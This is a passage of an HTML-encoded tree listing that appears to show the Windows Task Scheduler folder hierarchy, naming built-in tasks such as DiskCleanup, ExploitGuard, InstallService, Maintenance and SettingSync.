&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; DXGIAdapterCache
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DiskCleanup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SilentCleanup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DiskDiagnostic
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Microsoft-Windows-DiskDiagnosticDataCollector
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Microsoft-Windows-DiskDiagnosticResolver
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DiskFootprint
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Diagnostics
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; StorageSense
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DUSM
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; dusmtask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EDP
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EDP App Launch Task
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EDP Auth Task
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EDP Inaccessible Credentials Task
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; StorageCardEncryption Task
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ExploitGuard
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; ExploitGuard MDM policy Refresh
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Feedback
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Siuf
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; DmClient
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; DmClientOnScenarioDownload
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; File Classification Infrastructure
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Property Definition Sync
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileHistory
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; File History (maintenance mode)
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Flighting
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FeatureConfig
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ReconcileFeatures
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; UsageDataFlushing
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; UsageDataReporting
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneSettings
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; RefreshCache
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; HelloFace
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; FODCleanupTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Input
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LocalUserSyncDataAvailable
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MouseSyncDataAvailable
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PenSyncDataAvailable
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TouchpadSyncDataAvailable
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; InstallService
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScanForUpdates
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScanForUpdatesAsUser
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SmartRetry
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; WakeUpAndContinueUpdates
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WakeUpAndScanForUpdates
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; International
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Synchronize Language Settings
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LanguageComponentsInstaller
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Installation
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ReconcileLanguageResources
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Uninstallation
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; License Manager
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TempSignedLicenseExchange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Location
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Notifications
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WindowsActionDialog
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Maintenance
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WinSAT
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Management
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Autopilot
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; DetectHardwareChange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; RemediateHardwareChange
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Provisioning
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Cellular
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Logon
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Retry
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; RunOnReboot
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Maps
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MapsToastTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MapsUpdateTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MemoryDiagnostic
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ProcessMemoryDiagnosticEvents
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; RunFullMemoryDiagnostic
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Mobile Broadband Accounts
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MNO Metadata Parser
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; MUI
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; LPRemove
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Multimedia
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; SystemSoundsService
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NetTrace
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; GatherNetworkInfo
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; NlaSvc
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; WiFiTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Offline Files
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Background Synchronization
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Logon Synchronization
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PI
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SecureBootEncodeUEFI
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Secure-Boot-Update
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Sqm-Tasks
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Plug and Play
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Device Install Group Policy
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Device Install Reboot Required
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Sysprep Generalize Drivers
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Power Efficiency Diagnostics
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; AnalyzeSystem
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Printing
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; EduPrintProv
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; PrinterCleanupTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; PushToInstall
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; LoginCheck
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Registration
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Ras
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; MobilityManager
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RecoveryEnvironment
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; VerifyWinRE
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Registry
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; RegIdleBackup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RemoteAssistance
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; RemoteAssistanceTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RetailDemo
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; CleanupOfflineContent
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Servicing
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; StartComponentCleanup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SettingSync
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; BackgroundUploadTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; NetworkStateChangeTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SharedPC
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Account Cleanup
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Shell
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; CreateObjectTask
&#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FamilySafetyMonitor
